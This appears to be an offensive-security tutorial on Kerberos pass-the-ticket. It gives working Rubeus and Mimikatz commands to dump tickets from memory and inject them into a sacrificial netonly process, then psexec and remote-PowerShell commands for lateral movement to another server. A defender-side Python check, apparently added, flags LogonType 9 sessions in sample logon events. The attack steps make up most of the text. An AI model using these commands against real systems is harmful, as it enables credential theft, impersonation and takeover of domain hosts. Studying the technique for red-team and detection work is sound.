A Kerberos ticket can be considered a less permanent version of an NTLM hash: tickets typically last only 10 hours, and they are transferable across machines.

Pass-the-ticket – as the name suggests – is an authentication method using Kerberos tickets without knowing an account’s actual password.

We can enumerate available tickets with the built-in command klist.

> klist

Current LogonId is 0:0x5ea91

Cached Tickets: (1)

#0>     Client: user @ DOMAIN.LOCAL
        Server: krbtgt/DOMAIN.LOCAL @ DOMAIN.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 7/9/2020 5:19:55 (local)
        End Time:   7/9/2020 15:09:55 (local)
        Renew Time: 7/11/2020 12:14:43 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96

Or dump tickets with Rubeus and Mimikatz.

Rubeus dump
Mimikatz sekurlsa::tickets

The resulting base64 string can be saved as “.kirbi” files and imported with the following commands.

Rubeus ptt /ticket:<.kirbi>
Mimikatz kerberos:ptt <.kirbi>

That’s it! Your current session should have the privileges of the original ticket holder.

It’s also a good idea to first create a sacrificial process to pass the ticket to. This is to prevent overwriting existing tickets in your current session.

Rubeus createnetonly /program:"C:\Windows\hh.exe"
...
[*] Action: Create Process (/netonly)

[*] Showing process : False
[+] Process : 'C:\Windows\hh.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 10291
[+] LUID : 0x8a06289
Rubeus ptt /luid:0x8a06289 /ticket:<.kirbi>
Impersonateprocess 10291
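A defender-side counterpart to the createnetonly step above, added here as an example and not code from the original post: a small Python check over Windows Security 4624 logon events that flags LogonType 9 (NewCredentials) sessions, which is what runas /netonly and Rubeus createnetonly produce, and keys each finding on the session LUID (the same value Rubeus prints, which appears as TargetLogonId in the event). The event records below are constructed for the example and the field names assume the EventData names of the 4624 event; the per-user counting is an assumed triage heuristic, not something the post describes.

```python
"""Flag NewCredentials (LogonType 9) logon sessions in Windows Security 4624 events."""
from collections import defaultdict

NEW_CREDENTIALS = 9  # LogonType 9: runas /netonly, CreateProcessWithLogonW + LOGON_NETCREDENTIALS_ONLY

# Constructed sample records modelled on 4624/4672 EventData fields (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 2, "TargetUserName": "user", "TargetDomainName": "DOMAIN",
     "TargetLogonId": "0x5ea91", "TimeCreated": "2020-07-09T05:19:55"},
    {"EventID": 4624, "LogonType": 9, "TargetUserName": "user", "TargetDomainName": "DOMAIN",
     "TargetLogonId": "0x8a06289", "TimeCreated": "2020-07-09T05:25:01"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "SRV1$", "TargetDomainName": "DOMAIN",
     "TargetLogonId": "0x1c2d3e", "TimeCreated": "2020-07-09T05:26:10"},
    {"EventID": 4672, "TargetUserName": "user", "TargetLogonId": "0x5ea91",
     "TimeCreated": "2020-07-09T05:19:56"},  # special privileges assigned; not a logon event
]


def find_netonly_logons(events):
    """Return one finding per 4624 event whose LogonType is 9, keyed by the session LUID.

    The LUID is the pivot for further triage: tickets later injected with
    `Rubeus ptt /luid:<LUID>` land in exactly this logon session.
    """
    findings = []
    for ev in events:
        if ev.get("EventID") != 4624 or ev.get("LogonType") != NEW_CREDENTIALS:
            continue
        findings.append({
            "luid": ev["TargetLogonId"],
            "user": f'{ev["TargetDomainName"]}\\{ev["TargetUserName"]}',
            "time": ev["TimeCreated"],
            "reason": "LogonType 9 (NewCredentials): netonly session, review cached tickets for this LUID",
        })
    return findings


def netonly_sessions_per_user(events):
    """Count type-9 sessions per account (assumed heuristic: repeats from one account merit a look)."""
    counts = defaultdict(int)
    for finding in find_netonly_logons(events):
        counts[finding["user"]] += 1
    return dict(counts)


if __name__ == "__main__":
    for finding in find_netonly_logons(SAMPLE_EVENTS):
        print(finding)
    print(netonly_sessions_per_user(SAMPLE_EVENTS))
```

On a real host the same check would run over 4624 events exported from the Security log (for example with Get-WinEvent), matching the LUID against klist output from the flagged session.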

Execute away!

ls \\SRV1\C$

psexec -accepteula \\SRV1 cmd.exe

PowerShellRemotingCommand "SRV1" "whoami; hostname"

In-depth Rubeus usage and more Kerberos ticket info: